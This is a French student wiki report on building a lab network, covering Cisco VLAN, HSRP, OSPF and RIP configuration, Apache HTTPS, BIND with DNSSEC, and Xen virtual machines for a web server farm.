Comme on peut le voir, les VMs exposées possèdent chacune deux adresses IPv4 sur deux réseaux différents:&lt;br /&gt;
#Le réseau routé     :  193.48.57.176/28      (Class C)&lt;br /&gt;
#Le réseau non-routé :  10.10.0.0/16          (Class A)&lt;br /&gt;
&lt;br /&gt;
Nous devons allouer sur le réseau non-routé, dit privé, un VLAN pour chaque groupe pour qu'il puisse y connecter son client Wifi en plus des VLANs fonctionnels.&lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
====Configuration du commutateur 1 (COM-1)====&lt;br /&gt;
&lt;br /&gt;
=====Création des VLANs=====&lt;br /&gt;
Pour la création des VLANs nous utilisons la suite de commandes ci-dessous:&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
  vlan &amp;lt;NUMERO&amp;gt;&lt;br /&gt;
   name &amp;lt;NOM&amp;gt;&lt;br /&gt;
   exit&lt;br /&gt;
  exit&lt;br /&gt;
 write&lt;br /&gt;
&lt;br /&gt;
avec les couples de valeurs:&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! &amp;lt;NUMERO&amp;gt; !! &amp;lt;NOM&amp;gt; &lt;br /&gt;
|-&lt;br /&gt;
| 101&lt;br /&gt;
| VLAN0101&lt;br /&gt;
|-&lt;br /&gt;
| 102&lt;br /&gt;
| VLAN0102 &lt;br /&gt;
|-&lt;br /&gt;
| 103&lt;br /&gt;
| VLAN0103&lt;br /&gt;
|-&lt;br /&gt;
| 104&lt;br /&gt;
| VLAN0104&lt;br /&gt;
|-&lt;br /&gt;
| 105&lt;br /&gt;
| VLAN0105&lt;br /&gt;
|-&lt;br /&gt;
| 106&lt;br /&gt;
| VLAN0106&lt;br /&gt;
|-&lt;br /&gt;
| 131&lt;br /&gt;
| INTERCNX&lt;br /&gt;
|-&lt;br /&gt;
| 200&lt;br /&gt;
| XEN&lt;br /&gt;
|-&lt;br /&gt;
| 300&lt;br /&gt;
| MANAGEMENT&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
Donner au commutateur 1 une IP dans le Vlan de management : &lt;br /&gt;
&lt;br /&gt;
 conf t &lt;br /&gt;
  interface Vlan300&lt;br /&gt;
  ip address 10.60.200.254 255.255.255.0&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
En première approche, nous avons souhaité activer une connexion sécurisée (SSH) de management en créant des clés RSA et une configuration VTY mais le commutateur n'a pas l'air, à première vue, d'implémenter cette fonctionnalité  nous laissant qu'avec du Telnet (en Clair) que nous avons donc décidé de ne pas configurer.&lt;br /&gt;
&lt;br /&gt;
=====Liaison COM-1 vers XEN=====&lt;br /&gt;
Cette connexion doit faire transiter les différents VLANs et doit donc être en Trunk.&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
  interface GigabitEthernet1/1&lt;br /&gt;
   switchport&lt;br /&gt;
   switchport trunk encapsulation dot1q         # On utilise le standard 802.1q pour l'encapsulation&lt;br /&gt;
   switchport mode trunk                        # On met l'interface en mode Trunk&lt;br /&gt;
   no shut&lt;br /&gt;
&lt;br /&gt;
=====Liaison COM-1 vers R1=====&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
  interface GigabitEthernet4/1&lt;br /&gt;
   switchport&lt;br /&gt;
   switchport mode trunk&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=====Liaison COM-1 vers R2=====&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 interface GigabitEthernet1/2&lt;br /&gt;
  switchport&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
&lt;br /&gt;
=====Liaison COM-1 vers Borne Wifi=====&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
  interface GigabitEthernet4/4&lt;br /&gt;
   switchport&lt;br /&gt;
   switchport mode trunk&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
====Configuration du Routeur 1 (R1)====&lt;br /&gt;
&lt;br /&gt;
=====Création des Réseaux virtuels=====&lt;br /&gt;
La notion de Bridge Domain se rapproche de la notion de domaine de diffusion voire VLAN avec des options plus poussés pour le filtrage et le forwarding [https://www.cisco.com/c/en/us/td/docs/routers/asr1000/configuration/guide/chassis/bdi.html  plus]. Pour permettre à notre routeur d'avoir une interface sur un bridge domaine on doit lui configurer une interface logique appelée BDI (Bridge Domain Interface) .Un routeur peut avoir plusieurs Bridge Domaines mais un Bridge Domaine n'accepte qu'une seule BDI. &lt;br /&gt;
&lt;br /&gt;
On en profite aussi pour faire notre configuration HSRP (Hot standby router protocol) [https://en.wikipedia.org/wiki/Hot_Standby_Router_Protocol plus] et IPv6&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
  interface BDI101&lt;br /&gt;
   ip address 10.60.101.1 255.255.255.0                # adresse IPv4 locale&lt;br /&gt;
   standby version 2                                   # utilisation du protocol HSRP version 2 pour la haute disponibilité dans le cas où un routeur tombe en panne&lt;br /&gt;
   standby 101 ip 10.60.101.3                          # on définit un standby group pour cette interface avec l'adresse du routeur virtuel&lt;br /&gt;
   standby 101 preempt                                 # fait en sorte que le routeur actif avec la plus grande priorité prenne en charge le routage par préemption sur ce groupe &lt;br /&gt;
   ipv6 address 2001:660:4401:60A1::/64 eui-64         # configuration des adresses IPv6&lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60A1::/64 1000 900&lt;br /&gt;
   ipv6 nd router-preference High&lt;br /&gt;
   no shut &lt;br /&gt;
   exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
  interface BDI102&lt;br /&gt;
   ip address 10.60.102.1 255.255.255.0&lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 102 ip 10.60.102.3&lt;br /&gt;
   standby 102 preempt&lt;br /&gt;
   ipv6 address 2001:660:4401:60A2::/64 eui-64&lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60A2::/64 1000 900&lt;br /&gt;
   ipv6 nd router-preference High&lt;br /&gt;
   no shut &lt;br /&gt;
   exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 interface BDI103&lt;br /&gt;
  ip address 10.60.103.1 255.255.255.0&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 103 ip 10.60.103.3&lt;br /&gt;
  standby 103 preempt&lt;br /&gt;
  ipv6 address 2001:660:4401:60A3::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60A3::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  no shut &lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 interface BDI104&lt;br /&gt;
  ip address 10.60.104.1 255.255.255.0&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 104 ip 10.60.104.3&lt;br /&gt;
  standby 104 preempt&lt;br /&gt;
  ipv6 address 2001:660:4401:60A4::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60A4::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  no shut &lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 interface BDI105&lt;br /&gt;
  ip address 10.60.105.1 255.255.255.0&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 105 ip 10.60.105.3&lt;br /&gt;
  standby 105 priority 150                              # pour faire de l'équilibrage de charge nous faisons transiter en priorité le Vlan 105 par le R1&lt;br /&gt;
  standby 105 preempt&lt;br /&gt;
  ipv6 address 2001:660:4401:60A5::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60A5::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  no shut &lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 interface BDI106&lt;br /&gt;
  ip address 10.60.106.1 255.255.255.0&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 106 ip 10.60.106.3&lt;br /&gt;
  standby 106 priority 150                              # pour faire de l'équilibrage de charge nous faisons transiter en priorité le Vlan 106 aussi par le R1&lt;br /&gt;
  standby 106 preempt&lt;br /&gt;
  ipv6 address 2001:660:4401:60A6::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60A6::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  no shut &lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 interface BDI131&lt;br /&gt;
  ip address 192.168.222.10 255.255.255.248&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  no shut &lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 interface BDI200&lt;br /&gt;
  ip address 193.48.57.188 255.255.255.240&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 200 ip 193.48.57.190&lt;br /&gt;
  standby 200 preempt&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  no shut &lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
Et pour le management&lt;br /&gt;
  interface BDI300&lt;br /&gt;
   ip address 10.60.200.1 255.255.255.0&lt;br /&gt;
   no shut&lt;br /&gt;
   exit&lt;br /&gt;
  exit&lt;br /&gt;
 write&lt;br /&gt;
&lt;br /&gt;
=====Liaison R1 vers Réseau école =====&lt;br /&gt;
 interface GigabitEthernet0/0/0&lt;br /&gt;
  no ip address&lt;br /&gt;
  media-type rj45&lt;br /&gt;
  negotiation auto&lt;br /&gt;
  service instance 131 ethernet&lt;br /&gt;
   encapsulation dot1q 131&lt;br /&gt;
   rewrite ingress tag pop 1 symmetric&lt;br /&gt;
   bridge-domain 131&lt;br /&gt;
&lt;br /&gt;
=====Liaison R1 vers COM-1 =====&lt;br /&gt;
&lt;br /&gt;
 interface GigabitEthernet0/0/1&lt;br /&gt;
  no ip address&lt;br /&gt;
  negotiation auto&lt;br /&gt;
  &lt;br /&gt;
&lt;br /&gt;
sans quitter l'interface GigabitEthernet0/0/1 , et pour '''&amp;lt;NUMERO&amp;gt;''' ={ 101, 102, 103, 104, 105, 106, 200, 300 } , nous créons des instances de service en utilisant la suite de commandes:&lt;br /&gt;
&lt;br /&gt;
  service instance '''&amp;lt;NUMERO&amp;gt;''' ethernet&lt;br /&gt;
   encapsulation dot1q '''&amp;lt;NUMERO&amp;gt;'''&lt;br /&gt;
   rewrite ingress tag pop 1 symmetric&lt;br /&gt;
   bridge-domain '''&amp;lt;NUMERO&amp;gt;'''&lt;br /&gt;
&lt;br /&gt;
=====Liaison R1 vers COM-2 =====&lt;br /&gt;
&lt;br /&gt;
 interface GigabitEthernet0/0/2&lt;br /&gt;
  no ip address&lt;br /&gt;
  negotiation auto&lt;br /&gt;
&lt;br /&gt;
sans quitter l'interface GigabitEthernet0/0/2, et pour '''&amp;lt;NUMERO&amp;gt;''' = { 101, 102, 103, 104, 105, 106, 200, 300 } , nous créons des instances de service en utilisant la suite de commandes:&lt;br /&gt;
&lt;br /&gt;
  service instance '''&amp;lt;NUMERO&amp;gt;''' ethernet&lt;br /&gt;
   encapsulation dot1q '''&amp;lt;NUMERO&amp;gt;'''&lt;br /&gt;
   rewrite ingress tag pop 1 symmetric&lt;br /&gt;
   bridge-domain '''&amp;lt;NUMERO&amp;gt;'''&lt;br /&gt;
&lt;br /&gt;
=====Configuration Générale=====&lt;br /&gt;
Un routeur proposent différents protocoles de routage &lt;br /&gt;
 '''routerE304(config)'''#router ?                                                                                                                                     &lt;br /&gt;
   bgp       Border Gateway Protocol (BGP)                                                                                                                       &lt;br /&gt;
   eigrp     Enhanced Interior Gateway Routing Protocol (EIGRP)                                                                                                  &lt;br /&gt;
   isis      ISO IS-IS                                                                                                                                           &lt;br /&gt;
   iso-igrp  IGRP for OSI networks                                                                                                                               &lt;br /&gt;
   mobile    Mobile routes                                                                                                                                    &lt;br /&gt;
   odr       On Demand stub Routes                                                                                                                               &lt;br /&gt;
   ospf      Open Shortest Path First (OSPF)                                                                                                                     &lt;br /&gt;
   ospfv3    OSPFv3                                                                                                                                              &lt;br /&gt;
   rip       Routing Information Protocol (RIP)&lt;br /&gt;
&lt;br /&gt;
Nous allons en utiliser quelques uns dans notre implémentation&lt;br /&gt;
======OSPF pour IPv4======&lt;br /&gt;
Open Shortest Path First (OSPF) est un protocol qui permet à des routeurs adjacents dans un même domaine d'administration de s'échanger des informations sur le réseau et sa topologie. Cet échange d'information introduit une notion de voisinage entre routeurs. Les informations échangées (LSBD), permettent aux différents routeurs d'ajuster leurs tables de routage et de choisir les meilleures routes sur la base du coût de transmission. [https://en.wikipedia.org/wiki/Open_Shortest_Path_First Plus]&lt;br /&gt;
&lt;br /&gt;
 router ospf 1                                          # un numéro de processus                                                                                                         &lt;br /&gt;
  router-id 10.60.100.1                                 # un id pour le routeur. c'est comme ça qu'il s'identifie auprès de ses voisins                                                                                   &lt;br /&gt;
  summary-address 193.48.57.176 255.255.255.240         # on définie les adresses que l'on souhaite diffuser aux voisins                                                                                                             &lt;br /&gt;
  summary-address 10.60.0.0 255.255.0.0 not-advertise   # Celles que l'on veut pas diffuser (c'est notre précieux...)                                                                                                         &lt;br /&gt;
  redistribute connected subnets                        # autorise la diffusion pour les nouveaux réseaux qui peuvent être connectés                                                                                                                               &lt;br /&gt;
  network 192.168.222.8 0.0.0.7 area 2                  # délimite le domaine OSPF sur lequel on diffuse pour ne pas surcharger la bases de données de routeurs&lt;br /&gt;
&lt;br /&gt;
======RIP pour IPv6====== &lt;br /&gt;
''Routing Information Protocol'' pour l'échange d'information de routage. Ceci permet de router les paquets entre les routeurs de notre infrastructure avec le minimum de sauts (chemin le plus court).&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
  ipv6 router rip tpima5sc             # un identifiant pour le process RIP que nous voulons configurer                                                                                                                               &lt;br /&gt;
   redistribute connected metric 1     # on autorise la diffusion des routes connectées au maximum nombre de sauts                                                                                                                         &lt;br /&gt;
   redistribute static metric 1        # on autorise la diffusion des routes définies en statique au maximum nombre de sauts                                                                                                                         &lt;br /&gt;
   redistribute rip 1 metric 1         # on autorise la diffusion des routes sous le protocole rip 1&lt;br /&gt;
&lt;br /&gt;
Vous pouvez faire un diagnostique des routes connues et leur sources une fois que l'interconnexion avec le réseau de l'école est configurée.&lt;br /&gt;
 '''routerE304#'''sh ip route ospf 1          &lt;br /&gt;
 Codes: L - local, C - connected, S - static, '''R - RIP''', M - mobile, B - BGP&lt;br /&gt;
        D - EIGRP, EX - EIGRP external, '''O - OSPF''', IA - OSPF inter area &lt;br /&gt;
        N1 - OSPF NSSA external type 1, N2 - OSPF NSSA external type 2&lt;br /&gt;
        E1 - OSPF external type 1, E2 - OSPF external type 2&lt;br /&gt;
        i - IS-IS, su - IS-IS summary, L1 - IS-IS level-1, L2 - IS-IS level-2&lt;br /&gt;
        ia - IS-IS inter area, * - candidate default, U - per-user static route&lt;br /&gt;
        o - ODR, P - periodic downloaded static route, H - NHRP, l - LISP&lt;br /&gt;
        a - application route&lt;br /&gt;
        + - replicated route, % - next hop override, p - overrides from PfR&lt;br /&gt;
 &lt;br /&gt;
 Gateway of last resort is 192.168.222.14 to network 0.0.0.0&lt;br /&gt;
 &lt;br /&gt;
 O*E2  0.0.0.0/0 [110/1] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
       10.0.0.0/8 is variably subnetted, 85 subnets, 8 masks&lt;br /&gt;
 O E2     10.0.8.0/24 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.11.0.0/16 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.17.0.0/19 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.18.0.0/22 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.21.0.0/17 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.21.252.0/23 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.21.254.0/23 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.22.0.0/19 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.24.0.0/16 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
  --More--&lt;br /&gt;
======Configuration du spanning tree======&lt;br /&gt;
Pour eviter que l'apparition de boucles dans notre infrastructure nous devons activer le protocole spanning-tree.&lt;br /&gt;
En effet, dans les réseaux commutés Ethernet la présence de boucle génère des tempêtes de diffusion qui paralysent le réseau : tous les liens sont saturés de trames de diffusion qui tournent en rond dans les boucles et les tables d'apprentissage des commutateurs (switch) deviennent instables. [https://fr.wikipedia.org/wiki/Spanning_Tree_Protocol plus] &lt;br /&gt;
&lt;br /&gt;
 spanning-tree mode pvst                # utilisation du protocole de planning tree en mode par Vlan (per vlan spanning tree)                                                                                                                         &lt;br /&gt;
 spanning-tree extend system-id         # utilisation du standard system-id pour l'assignation des identifiants uniques&lt;br /&gt;
&lt;br /&gt;
======unicast IPv6======&lt;br /&gt;
On active unicast IPv6 permettant de router les addresses IPv6 unicast Global (2001:...) que nous avons choisis.&lt;br /&gt;
 ipv6 unicast-routing&lt;br /&gt;
&lt;br /&gt;
==Services Internet == &lt;br /&gt;
&lt;br /&gt;
=== Serveur SSH ===&lt;br /&gt;
&lt;br /&gt;
Pour se connecter à la VM une première fois,  il faut utiliser la commande :&lt;br /&gt;
 xl console mycoplasma  --depuis cordouan.&lt;br /&gt;
&lt;br /&gt;
Pour sécuriser les services réseaux il faut être capable de se connecter à la VM en SSH, il faut faire quelques modifications dans le fichier etc/ssh/sshd_config de la VM. Voici la modification : &lt;br /&gt;
  #PermitRootLogin prohibit-password&lt;br /&gt;
par&lt;br /&gt;
  PermitRootLogin yes&lt;br /&gt;
&lt;br /&gt;
Par la suite, il sera possible d'accéder à la VM directement : &lt;br /&gt;
 ssh root@193.48.57.178&lt;br /&gt;
&lt;br /&gt;
===Serveur DNS ===&lt;br /&gt;
&lt;br /&gt;
Nous avons utiliser le registrar Gandi (http://www.gandi.net) pour réserver notre nom de domaine, nous avons choisi mycoplasma2.&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps, faire apparaitre dans le fichier /etc/bind/named.conf.options la ligne suivante: &lt;br /&gt;
 dnssec-validation auto;&lt;br /&gt;
&lt;br /&gt;
====Configuration apache ====&lt;br /&gt;
&lt;br /&gt;
 root@mycoplasma:~# cat /etc/apache2/sites-available/loadbalance.conf &lt;br /&gt;
&lt;br /&gt;
 &amp;lt;VirtualHost 193.48.57.178:443&amp;gt;&lt;br /&gt;
 	ServerName www.mycoplasma2.site&lt;br /&gt;
 	ServerAlias mycoplasma2.site	&lt;br /&gt;
 	DocumentRoot /var/www/html/&lt;br /&gt;
 	ServerAdmin lina.mejbar@polytech-lille.net&lt;br /&gt;
 	SSLEngine on&lt;br /&gt;
 	SSLCertificateFile /etc/ssl/certs/mycoplasma2.site.crt&lt;br /&gt;
  	SSLCertificateKeyFile /etc/ssl/private/myserver.key &lt;br /&gt;
 	SSLCertificateChainFile /etc/ssl/certs/GandiStandardSSLCA2.pem&lt;br /&gt;
 	SSLVerifyClient None&lt;br /&gt;
 	ErrorLog ${APACHE_LOG_DIR}/lb-error.log&lt;br /&gt;
 	CustomLog ${APACHE_LOG_DIR}/lb-access.log combined&lt;br /&gt;
 &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;VirtualHost 193.48.57.178:80&amp;gt;&lt;br /&gt;
 	ServerName www.mycoplasma2.site&lt;br /&gt;
 	ServerAlias mycoplasma2.site&lt;br /&gt;
 	ProxyPass &amp;quot;/&amp;quot; &amp;quot;http://192.168.0.2:8002/&amp;quot;&lt;br /&gt;
  	ProxyPassReverse &amp;quot;/&amp;quot; &amp;quot;http://192.168.0.2:8002/&amp;quot;&lt;br /&gt;
 	Redirect &amp;quot;/&amp;quot; &amp;quot;https://www.mycoplasma2.site&amp;quot;&lt;br /&gt;
 &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Enfin pour enregistrer nos modifications :&lt;br /&gt;
  a2enmod ssl&lt;br /&gt;
  a2ensite mycoplasma2.site.conf&lt;br /&gt;
  service apache2 restart&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Comme on peut le voir sur la photo ci-dessous : nous avons accès à notre site de façon sécurisée.&lt;br /&gt;
[[Fichier:groupe2_https.png|center|500px|Nous avons accès au site sécurisé]]&lt;br /&gt;
&lt;br /&gt;
====Configuration bind9====&lt;br /&gt;
&lt;br /&gt;
BIND veut dire : Berkeley Internet Name Daemon&lt;br /&gt;
Nous avons déjà installer le package [http://www.example.com/ titre du lien ici].&lt;br /&gt;
&lt;br /&gt;
Ensuite il faut créer un fichier de configuration dans le dossier /etc/bind/ avec les informations de notre site: &lt;br /&gt;
&lt;br /&gt;
 root@mycoplasma:/etc/bind# cat mycoplasma2.site&lt;br /&gt;
&lt;br /&gt;
 ;&lt;br /&gt;
 ; BIND data file for local loopback interface&lt;br /&gt;
 ;&lt;br /&gt;
 $TTL	604800 &lt;br /&gt;
 @	IN	SOA	ns.chlamydiae.site. root.mycoplasma2.site (&lt;br /&gt;
  			4	; Serial&lt;br /&gt;
  			604800	; Refresh&lt;br /&gt;
 			86400	; Retry&lt;br /&gt;
 			2419200	; Expire&lt;br /&gt;
 			604800 )	; Negative Cache TTL&lt;br /&gt;
 ;&lt;br /&gt;
 	IN	NS	ns.mycoplasma2.site.&lt;br /&gt;
 	IN	NS	ns6.gandi.net.&lt;br /&gt;
 @       IN      A       193.48.57.178&lt;br /&gt;
 ns	IN	A	193.48.57.178&lt;br /&gt;
 www	IN	A	193.48.57.178&lt;br /&gt;
&lt;br /&gt;
Il faut modifier le fichier named.conf.local pour lui donner le nom de notre fichier configuration et de définir les paramètres généraux d'une zone.:&lt;br /&gt;
 root@mycoplasma:/etc/bind# cat named.conf.local &lt;br /&gt;
&lt;br /&gt;
 zone &amp;quot;mycoplasma2.site&amp;quot; {&lt;br /&gt;
         type master;&lt;br /&gt;
         file &amp;quot;/etc/bind/mycoplasma2.site&amp;quot;; &lt;br /&gt;
         allow-transfer {217.70.177.40;}; &lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
Il faut ensuite relancer avec la commande suivante :&lt;br /&gt;
 service bind9 restart&lt;br /&gt;
&lt;br /&gt;
Il faut aussi ajouter dans l'onglet GlueRecords le nom de domaine de notre site, et celui de gandi.&lt;br /&gt;
&lt;br /&gt;
===Sécurisation de site web par certificat===&lt;br /&gt;
&lt;br /&gt;
On doit configurer apache2 en mode sécurisé à l’aide d’une clef asymétrique et d’un certificat signé par une autorité de certification. Le CA signe un CSR (Certificate Signing Request), pour ce faire il faut créer les clefs et le CSR en utilisant openssl. &lt;br /&gt;
Il faut ensuite le transformer en un certificat, on va donc configurer apache2 sur le port 443 afin qu'il puisse gérer du HTTPS. &lt;br /&gt;
&lt;br /&gt;
 openssl req -nodes -newkey rsa:2048 -sha256 -keyout myserver.key -out server.csr&lt;br /&gt;
&lt;br /&gt;
Il faut ensuite renseigner quelques informations : &lt;br /&gt;
&lt;br /&gt;
   Country Name (2 letter code) [AU]: '''France'''&lt;br /&gt;
   State or Province Name (full name) [Some-State]: '''Haut de France'''&lt;br /&gt;
   Locality Name (eg, city) []: '''Lille'''&lt;br /&gt;
   Organization Name (eg, company) [Internet Widgits Pty Ltd]: '''Polytech Lille'''&lt;br /&gt;
   Organizational Unit Name (eg, section) []: IMA5&lt;br /&gt;
   Common Name (e.g. server FQDN or YOUR name) []: '''mycoplasma2.site'''&lt;br /&gt;
   Email Address []:&lt;br /&gt;
   Please enter the following 'extra' attributes to be sent with your certificate request&lt;br /&gt;
   A challenge password []:&lt;br /&gt;
   An optional company name []:&lt;br /&gt;
&lt;br /&gt;
La seule vraie ligne où il ne faut pas se tromper, c'est celle où l'on indique le nom du site (Common Name), si la ligne est fausse Gandi n'acceptera pas votre clef.&lt;br /&gt;
Une fois ces informations renseignées, une clef est générée. &lt;br /&gt;
&lt;br /&gt;
/!\ Il faut la garder précieusement et ne pas la SUPPRIMER des fichiers de la machine virtuelle, dans ce cas il faudra tout recommencer avec un nouveau nom de domaine parce que la clef n'est générable qu'une seule fois.&lt;br /&gt;
Il faut maintenant copier le contenu de ce fichier avec le &amp;quot;BEGIN CERTIFICATE REQUEST-----&amp;quot; et le &amp;quot;END CERTIFICATE REQUEST-----&amp;quot; sur le site de gandi.&lt;br /&gt;
&lt;br /&gt;
===Sécurisation de serveur DNS par DNSSEC===&lt;br /&gt;
 root@mycoplasma:/etc/bind# vim named.conf&lt;br /&gt;
&lt;br /&gt;
 include &amp;quot;/etc/bind/named.conf.options&amp;quot;;&lt;br /&gt;
 include &amp;quot;/etc/bind/named.conf.local&amp;quot;;&lt;br /&gt;
 include &amp;quot;/etc/bind/named.conf.default-zones&amp;quot;&lt;br /&gt;
&lt;br /&gt;
Pour générer les clefs dans un même dossier, il faut le créer voici le chemin pour notre groupe :&lt;br /&gt;
 root@mycoplasma:/etc/bind/mycoplasma2.site.dnssec# &lt;br /&gt;
&lt;br /&gt;
Pour générer les clés KSK on lance la commande suivante :&lt;br /&gt;
 dnssec-keygen -a RSASHA1 -b 2048 -f KSK -n ZONE mycoplasma2.site&lt;br /&gt;
Pour ZSK :&lt;br /&gt;
 dnssec-keygen -a RSASHA1 -b 1048 -n ZONE mycoplasma2.site&lt;br /&gt;
&lt;br /&gt;
On peut maintenant rajouter nos clefs dans le fichier mycoplasma2.site: &lt;br /&gt;
&lt;br /&gt;
 root@mycoplasma:~# cat /etc/bind/mycoplasma2.site&lt;br /&gt;
&lt;br /&gt;
 $TTL	604800&lt;br /&gt;
 '''$include /etc/bind/mycoplasma2.site.dnssec/mycoplasma2.site-ksk.key'''&lt;br /&gt;
 '''$include /etc/bind/mycoplasma2.site.dnssec/mycoplasma2.site-zsk.key'''&lt;br /&gt;
 @	IN	SOA	ns.chlamydiae.site. root.mycoplasma2.site (&lt;br /&gt;
  			4	; Serial&lt;br /&gt;
 			604800	; Refresh&lt;br /&gt;
 			86400	; Retry&lt;br /&gt;
 			2419200	; Expire&lt;br /&gt;
 			604800 )	; Negative Cache TTL&lt;br /&gt;
 ;&lt;br /&gt;
 	IN	NS	ns.mycoplasma2.site.&lt;br /&gt;
 	IN	NS	ns6.gandi.net.&lt;br /&gt;
 @      IN      A       193.48.57.178&lt;br /&gt;
 ns	IN	A	193.48.57.178&lt;br /&gt;
 www	IN	A	193.48.57.178&lt;br /&gt;
&lt;br /&gt;
On signe les enregistrements de la zone en exécutant la commande suivante :&lt;br /&gt;
 dnssec-signzone -o mycoplasma2.site -k mycoplasma2.site-ksk ../mycoplasma2.site mycoplasma2.site-zsk&lt;br /&gt;
&lt;br /&gt;
Dernière étape, il fait ajouter le chemin du fichier pour utiliser le fichier de zone signé :&lt;br /&gt;
&lt;br /&gt;
 root@mycoplasma:~# cat /etc/bind/named.conf.local &lt;br /&gt;
&lt;br /&gt;
 zone &amp;quot;mycoplasma2.site&amp;quot; {&lt;br /&gt;
        type master;&lt;br /&gt;
        '''file &amp;quot;/etc/bind/mycoplasma2.site.signed&amp;quot;;''' &lt;br /&gt;
        allow-transfer {217.70.177.40;}; &lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 service bind9 restart&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Nous vérifions sous dnsviz.net le bon fonctionnement du DNSSEC :&lt;br /&gt;
[[Fichier:groupe2_dnsViz.png|center|500px]]&lt;br /&gt;
&lt;br /&gt;
===Serveur Freeradius===&lt;br /&gt;
&lt;br /&gt;
==Ferme de serveurs Web==&lt;br /&gt;
Il faut implanter une architecture d’équilibrage de charge pour un site Web.&lt;br /&gt;
&lt;br /&gt;
===Architecture générale de la ferme===&lt;br /&gt;
Pour ce faire, chaque binôme a créé une nouvelle machine virtuelle Xen qui hébergera un serveur Web. Ainsi chaque binôme pourra disposer de plusieurs serveurs Web proposant exactement le même site sur plusieurs machines différentes. Ces serveurs Web ne seront pas directement disponibles d’Internet mais au travers d’un équilibreur de charge tournant sur leur machine virtuelle principale.&lt;br /&gt;
&lt;br /&gt;
'''Nom de la Machine Virtuelle ''' : private-mycoplasma&lt;br /&gt;
&lt;br /&gt;
'''Commandes''': &lt;br /&gt;
La MV doit être créée sur Cordouan.&lt;br /&gt;
 root@zabethX:~# ssh root@cordouan.insecserv.deule.net &lt;br /&gt;
&lt;br /&gt;
 root@cordouan:~# xen-create-image --hostname=private-mycoplasma --ip=ip 192.168.0.2 --dir=/usr/local/xen&lt;br /&gt;
 root@cordouan:~# xl create private-mlycoplasma.cfg&lt;br /&gt;
&lt;br /&gt;
Il faut suivre les logs de la création de la machine virtuelle avec le fichier suivant:&lt;br /&gt;
 root@cordouan:~# tail -f /var/log/xen-tools/private-mycoplasma.log&lt;br /&gt;
&lt;br /&gt;
Pour accèder une première fois à la machine virtuelle, il faut utiliser cette commande car SSH n'est pas encore autorisé.&lt;br /&gt;
 root@cordouan:~# xl console private-mycoplasma&lt;br /&gt;
&lt;br /&gt;
